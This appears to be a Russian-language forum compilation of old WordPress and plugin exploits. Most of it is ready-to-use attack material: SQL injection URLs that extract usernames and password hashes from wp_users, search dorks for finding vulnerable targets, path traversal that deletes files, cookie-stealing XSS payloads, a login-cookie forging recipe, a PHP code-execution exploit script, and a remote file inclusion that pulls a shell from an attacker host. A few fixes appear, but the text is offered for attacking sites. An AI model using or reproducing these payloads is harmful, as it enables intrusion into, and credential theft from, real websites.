Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability Файловый менеджер находится тут: Code: http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php После загрузки скрипт вы найдете в этом каталоге: Code: http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php) Запрос для поиска: Code: plugins/wp-filemanager/ inurl:/wp-filemanager/
Code: /wp-admin/index.php?page=\..\..\file.php /wp-admin/index.php?page=\..\..\.htaccess /wp-admin/link-manager.php?page=\..\..\.htaccess /wp-admin/link-add.php?page=\..\..\.htaccess /wp-admin/link-categories.php?page=\..\..\.htaccess /wp-admin/link-import.php?page=\..\..\.htaccess /wp-admin/theme-editor.php?page=\..\..\.htaccess /wp-admin/plugin-editor.php?page=\..\..\.htaccess /wp-admin/profile.php?page=\..\..\.htaccess /wp-admin/users.php?page=\..\..\.htaccess /wp-admin/options-general.php?page=\..\..\.htaccess /wp-admin/options-writing.php?page=\..\..\.htaccess /wp-admin/options-reading.php?page=\..\..\.htaccess /wp-admin/options-discussion.php?page=\..\..\.htaccess /wp-admin/options-permalink.php?page=\..\..\.htaccess /wp-admin/options-misc.php?page=\..\..\.htaccess /wp-admin/import.php?page=\..\..\.htaccess /wp-admin/admin.php?page=\..\..\.htaccess /wp-admin/bookmarklet.php?page=\..\..\.htaccess /wp-admin/cat-js.php?page=\..\..\.htaccess /wp-admin/inline-uploading.php?page=\..\..\.htaccess /wp-admin/options.php?page=\..\..\.htaccess /wp-admin/profile-update.php?page=\..\..\.htaccess /wp-admin/sidebar.php?page=\..\..\.htaccess /wp-admin/user-edit.php?page=\..\..\.htaccess win only
WordPress <=2.3.1 Cookies Manipulation - Вход по md5() хешу пароля в куках Вход по md5() хешу пароля в куках Программа: WordPress 2.3.1 и более ранние версии Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности. Уязвимость существует из-за того, что злоумышленник может создать два аутентификационных файла куки ("wordpressuser_*" и "wordpresspass_*") из данных в таблице "users" и получить административный доступ к приложения. Для успешной эксплуатации уязвимости злоумышленнику требуется получить доступ на чтение таблицы "users" в базе данных. описание и сайт http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt ================================== PHP: $siteurl;$host; 'wordpressuser_'.md5($siteurl).'='.$login 'wordpresspass_'.md5($siteurl).'='.md5(md5($pass)) Здесь $siteurl - переменная которая лежит в БД: wp_options -siteurl Тоесть при SQL-инъекции желательно вытащить и ее тоже: (select siteurl from wp_options) Иногда один вордпресс используется для разных доменных имен. Тогда вместо $siteurl берется $host, фактически равное URL-пути до блога, например: http://wordpress.com/blog без слеша на конце. NEW! Дополнение. Раскрытие COOKIEHASH. Необязательно вообще добывать siteurl, кодировать его в мд5 и проверять. Достаточно послать пост-пакет на wp-pass.php или на wp-login.php В ответе вам вернется валидный COOKIEHASH кукиса. [-1-] /wp-login.php?action=logout [-2-] wp-pass.php Code: POST /wordpress/wp-pass.php HTTP/1.0 Host: localhost Content-Length: 20 post_password=test
Files locations Code: blogscout lectblog blogs blog blog-* blog* myblog bloggt blo *-blog wp wordpress wordpress.1 wordpress-1 wordpress_1 wordpress-* wordpress_* weblog webblog webblogs web-blog my-journals myjournal my-favorite-blog myblog myblogs my-blogs wp1-5 wp2.2 wp2-2 wp2.3 wp2-3 wp2.2 wp2.0 powered-by-wordpress wordpress-mu wordpress_1_5 wordpress-1.5 wordpress-1-5-1 wordpress-1.5.2 wordpress-1.0.2 wordpress-1-2-2 wordpress_2.0_only wordpress_2.3-series wordpress_2.3.2 wordpress_2-3-1 Wordpress_2.4 Wordpress_2.5 Wordpress_2-5 wordpress_2.3.1 wordpress_2.0.2 wordpress_2.3 wordpress_2.0.7 Wordpress_2.4 wordpress_2.2.3 wordpress_2.1.2 WordPress_2.4 wordpress_2.3.1 WordPress_2-3 WordPress_2-2-2 WordPress_2-3-3 wordpress_2-3 Wordpress_2-2
Democracy 2.0.1 HTML Injection Vulnerability Code: http://wordpress.dom/blah’style=xss:expression(alert(document.cookie)); (Tested on IE7) OR http://wordpress.dom/blah’onMouseOver=javascript:alert(document.cookie);// (Testing on Firebox & IE) fix PHP: Vulnerable code: in class.php (Line 166) $url = htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’, ‘dem_poll_id’ => $this->id))); Change to: $url = htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’, ‘dem_poll_id’ => $this->id)), ENT_QUOTES);
WP TextLinkAds Plugin SQL Injection Vulnerability Code: http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id=’/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23 fix PHP: The vulnerable code is found on line 512: $postId = $postId; This variable is passed to $wpdb->get_results without being sanitised. to fix this hole, simply change the above line to: $postId = (int) $postId;
WordPress<=2.0.3 Arbitrary file deletion Только на Windows: HTML: http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\.. \.htaccess Это также может быть использовано для проведения DoS-атаки. При удалении index.php сайт перестанет нормально функционировать. WordPress<=2.0.3 DoS: HTML: http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php Только на Windows: HTML: http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\.. \index.php XSS: HTML: http://site/wp-admin/edit.php?page=wp-db-backup. php&backup=%3Cscript%3Ealert(document. cookie)%3C/script%3E XSS: wp-cat2tag converter: HTML: http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script> Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability Code: remote sql injection exploit ############################################################### # >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4. # >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/* (wp_tbv_users) # >>> google: Fredrik Fahlstad. Version: 1.7.4. # >>> author websec Team ./members =====> Virus_C, Refresh , Virusa # >>> page : hacking.ge ############################################################### this is example http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/* # milw0rm.com [2008-01-19]
XSS in plugin wp-slimstat 0.92 para Wordpress PoC directamente: Code: http://wordpress-web-blog.com/wp-admin/index.php?page=wp-sl imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss] PoC En Perl: Code: # Wordpress 2.3 0day exploit – http://xssworm.com # # A bug exist in wordpress 2.3 that allow hacker to # steal blog cookie from wordpress blogmin. # # To exploit scripting bug the attacker make link # to URL of slimstat with XSS shellcode and force # blog admin to hit link by embedding into fish # email or making blogmin follow interesting links. # Also hacker can embed into refer or trackback # to inject scripting into wordpress dashboard or # make blogmin visit malicious resource when viewing # he’s blog. # # # Status: not patched published 0day vulnerability # Vendor: wordpress.org # Credit: http://xssworm.com # Discovery: 1st November 2007 # Exploit developer: Fracesco Vaj ([email protected]) # # Instruction: # To execute exploit for wordpress you will need perl or linux # # Usage: # # Execute with perl or linux as: # perl wordpress-2.3-0day-xss-injection-bug.pl # # Hacker will get prompts for target information. # Please do not use for irresponsible hacking or to make money. # Disclaimer: XSSWORM.COM is not responsible. # # #use Net::DNS:Simple; #use Math; use Socket; print "Welcome. What is target email address of wordpress blog admin : \n"; my $target = <stdin>; print "ok target is $target\n"; sleep(3); print "ok What is address of wordpress blog : \n"; sleep(5); my $address = <stdin>; print "ok target is $target\n"; sleep(6); # print "testing" print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n"; print "\n\n — CUT OUTPUT HERE — \n\n"; print "HELO xssworm.com\n"; print "RSET\n"; PRINT "MAIL FROM: <[email protected]>\n"; print "RCPT TO: <$target>\n"; print "DATA\n”; print “Free x pciture and movies at $address\n"; print "\r\n.\r\nquit\r\n"; print "\n\n — END OF OUTPUT CUT HERE –\n"; print ""; print "Ok now you neeed to cut the exploit above and paste it to:\n"; print "$address : 25 \n"; print "Shellcode by [email protected] c. 2007\n"; print "End of attack.\n"; print ""; #print "Debug mode on" #print "XSS initialized" #payload sleep(1); return(0); # snips</[email protected]></stdin></stdin>
Full path disclosure: Code: /wp-admin/theme-editor.php?page= /wp-admin/plugins.php?page= /wp-admin/plugin-editor.php?page= /wp-admin/profile.php?page= /wp-admin/users.php?page= /wp-admin/options-general.php?page= /wp-admin/cat-js.php?page= /wp-admin/inline-uploading.php?page= /wp-admin/options.php?page= /wp-admin/profile-update.php?page= /wp-admin/sidebar.php?page= /wp-admin/user-edit.php?page= /wp-admin/admin.php?page= /wp-admin/admin-footer.php /wp-admin/admin-functions.php /wp-admin/edit-form.php /wp-admin/edit-form-advanced.php /wp-admin/edit-form-comment.php /wp-admin/edit-link-form.php /wp-admin/index.php?page= /wp-admin/link-manager.php?page= /wp-admin/link-add.php?page= /wp-admin/link-categories.php?page= /wp-admin/link-import.php?page= /wp-admin/edit-page-form.php /wp-admin/menu.php /wp-admin/menu-header.php /wp-admin/import/blogger.php /wp-admin/import/dotclear.php /wp-admin/import/greymatter.php /wp-admin/import/livejournal.php /wp-admin/options-writing.php?page= /wp-admin/options-reading.php?page= /wp-admin/options-discussion.php?page= /wp-admin/options-permalink.php?page= /wp-admin/options-misc.php?page= /wp-admin/import.php?page= /wp-admin/import/mt.php /wp-admin/import/rss.php /wp-admin/import/textpattern.php /wp-admin/bookmarklet.php?page=
===================== Изменения в версиях для общего ознакомления: _http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path=tags%2F2.3.2&new=6528 _http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=priority ===================== Описание: Перебор логина/пароля в обход логирования. Возможность определение логина, перебора пароля через куки(wp-login.php), базик-авторизацию(wp-app.php). PHP: function wp_login() __('<strong>ERROR</strong>: Invalid username.'); __('<strong>ERROR</strong>: Incorrect password.'); ======================== Описание: Раскрытие COOKIEHASH. Иногда бывают траблы с формированием куков для эксплоита. Обычно это происходит, если блог работает на несколько доменов/субдоменов сразу. "siteurl" добытый из базы не подходит. В хидере нас вернется пустой кукис с префиксом. /wp-login.php?action=logout /wp-pass.php ===================== Описание: Права админа: Запись в wp-config.php Отстутствие проверки имени файла при записи. Читать в wp-config.php нельзя. Но при записи забыли поставить проверку. Можно указать свой удаленный сервер и поадминить блог через свою бд. Читать нельзя: /wp-admin/templates.php?file=wp-config.php Но можно писать: /wp-admin/templates.php POST: newcontent=<?php;phpinfo();?>&action=update&file=wp-config.php ===================== Описание: Passive XSS $_POST['pages-sortby'] Права: админ Примеры уязвимого кода: /wp-admin/widgets.php PHP: function wp_widget_pages_control() { $sortby = stripslashes( $_POST['pages-sortby'] ); <option value="post_title"<?php selected( $options['sortby'], 'post_title' ); ?>><?php _e('Page title'); ?></option> <option value="menu_order"<?php selected( $options['sortby'], 'menu_order' ); ?>><?php _e('Page order'); ?></option> <option value="ID"<?php selected( $options['sortby'], 'ID' ); ?>><?php _e( 'Page ID' ); ?></option> ===================== Описание: Хранение пароля и логина админа к мылу в открытом виде в бд, отображение в админке. /wp-admin/options-writing.php wp_options -mailserver_login -mailserver_pass ===================== Описание: При импорте блога, если присутствуют посты без автора(анонимы), создается юзверь с дефолтными настройками. Тоесть возможно существование учеток с дефолтным паролем "password". Примеры уязвимого кода: /wp-admin/import/greymatter.php PHP: $user_id = username_exists($post_author); if (!$user_id) { // if deleted from GM, we register the author as a level 0 user $user_ip="127.0.0.1"; $user_domain="localhost"; $user_browser="server"; $user_joindate="1979-06-06 00:41:00"; $user_login=$wpdb->escape($post_author); $pass1=$wpdb->escape("password"); $user_nickname=$wpdb->escape($post_author); $user_email=$wpdb->escape("[email protected]"); $user_url=$wpdb->escape(""); $user_joindate=$wpdb->escape($user_joindate); $user_info = array("user_login"=>$user_login, "user_pass"=>$pass1, "user_nickname"=>$user_nickname, "user_email"=>$user_email, "user_url"=>$user_url, "user_ip"=>$user_ip, "user_domain"=>$user_domain, "user_browser"=>$user_browser, "dateYMDhour"=>$user_joindate, "user_level"=>0, "user_idmode"=>"nickname"); $user_id = wp_insert_user($user_info); $this->gmnames[$postinfo[1]] = $user_id; =====================
# Author : Houssamix From H-T Team # Script : Wordpress Plugin fGallery 2.4.1 # Download : http://www.fahlstad.se/wp-plugins/fgallery/ # BUG : Remote SQL Injection Vulnerability # Dork : inurl:/wp-content/plugins/fgallery/ ## Vulnerable CODE : ~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~ PHP: $cat = $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]"); $images = $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'"); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Exploit : [Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users-- Example # Script : Wordpress Plugin WP-Cal # Download : http://www.fahlstad.se/wp-plugins/wp-cal/ # BUG : Remote SQL Injection Vulnerability # Dorks : inurl:/wp-content/plugins/wp-cal/ inurl:/WP-Cal/ ## Vulnerable CODE : ~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~ PHP: $id = $_GET['id']; $event = $wpdb->get_row("SELECT * FROM $table WHERE id = $id"); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Exploit : /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users-- example :
Wordpress Plugin wp-adserve (adclick.php) SQL Injection SQL Injection: Code: http://www.site.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users Для поиска вводим: Code: allinurl: "wp-adserve" Wordpress Plugin WassUp 1.4.1 Remote SQL Injection SQL Injection: Code: http://www.site.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6,0x7c,8,9,10%20%20from%20wp_users Для поиска вводим: Code: allinurl: "plugins/wassup" (c)
Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities PoC: http://milw0rm.com/exploits/5035 Wordpress Plugin Wordspew Remote SQL Injection Vulnerability PoC: http://milw0rm.com/exploits/5039
Wordpress Pluging wp-footnotes 2.2 Multiple XSS Code: http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot notes_current_settings[priority]="><script>alert("XSS" )</script> http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot notes_current_settings[style_rules]=</textarea><script>alert(" XSS")</script> http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current _settings[pre_footnotes]=</textarea><script>alert("XSS" )</script> http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current _settings[post_footnotes]=</textarea><script>alert(":- (")
Wordpress Plugin st_newsletter Remote SQL Injection SQL Injection Code: wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users Для поиска: Code: allinurl :"wp-content/plugins/st_newsletter" allinurl :"shiftthis-preview.php" (c)
Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit: PHP: <?php /* WordPress [MU] blog's options overwrite Credits : Alexander Concha <alex at buayacorp dot com> Website : http://www.buayacorp.com/ Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html This exploit uses active_plugins option to execute arbitrary PHP */ include_once './class-snoopy.php'; // Fix Snoopy class SnoopyExt extends Snoopy { function _prepare_post_body($formvars, $formfiles) { if ( is_string($formvars) ) { return $formvars; } return parent::_prepare_post_body($formvars, $formfiles); } } set_time_limit( 0 ); // Any user with 'manage_options' and 'upload_files' capabilities $user = 'user'; $pass = '1234'; $blog_url = 'http://localhost.localdomain/mu/'; $remote_file = ''; // relative path to wp-content $local_file = ''; // the contents of this file, if any, will be uploaded $snoopy = new SnoopyExt(); $snoopy->maxredirs = 0; $snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check'; $snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass)); $snoopy->setcookies(); // Set auth cookies for future requests if ( empty($remote_file) ) { // Upload a new file $snoopy->_submit_type = 'image/gif'; $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents()); if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) { $remote_file = basename($match[1]); } } if ( empty($remote_file) ) die('Exploit failed...'); // Look for real path $snoopy->fetch("{$blog_url}wp-admin/export.php?download"); if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) { $remote_file = preg_replace('#.*?wp-content#', '', $match[1]); } if ( empty($remote_file) ) die('Exploit failed...'); // It asumes that file uploads are stored within wp-content $remote_file = '../' . ltrim($remote_file, '/'); $snoopy->fetch("{$blog_url}wp-admin/plugins.php"); // Recover previous active plugins $active_plugins = array(); if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) { foreach ($matches[0] as $plugin) { if ( preg_match('#plugin=([^&]+)#', $plugin, $match) ) $active_plugins[] = urldecode($match[1]); } print_r($active_plugins); } $active_plugins[] = $remote_file; // Fetch a valid nonce $snoopy->fetch("{$blog_url}wp-admin/options-general.php"); if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) { // Finally update active_plugins $snoopy->set_submit_normal(); $snoopy->submit("{$blog_url}wp-admin/options.php", array( 'active_plugins' => $active_plugins, '_wpnonce' => $match[1], 'action' => 'update', 'page_options' => 'active_plugins', )); } function get_contents() { global $local_file; return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>'; } ?> # milw0rm.com [2008-02-05]
Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability example Code: http://xxxxx/forums?forum=xxxx&topic= (expliot) EXPLOİT 1 : Code: -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* [COLOR=Red][B] EXPLOİT 2 :[/B][/COLOR] Code: SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number) example Code: www.xxxxx/forums?forum=1(expliot) &topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability example : Code: http://www.xxx.com/sf-forum?forum=[exploit] EXPLOIT 1 : Code: -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* exploit 2 : Code: -99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/* (с)milw0rm.com
Wordpress Photo album Remote SQL Injection Vulnerability EXAMPLE Сплоит зы Auth S@BUN http://milw0rm.com/exploits/5135
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities RFI Register Globals: ON PoC: Code: http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight. php?libpath=http://attacker.tld/shell.txt? XSS Register Globals: ON PoC: Code: http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php ?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php? text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?t ext=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?ur l=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/scrip t%3E http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text= %3Cli%3E Register Globals: Off Code: http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page =%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script %3E Remote Code Execution Register Globals: ON PoC: Code: http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text= %3C?php%20system(%22ls%22);
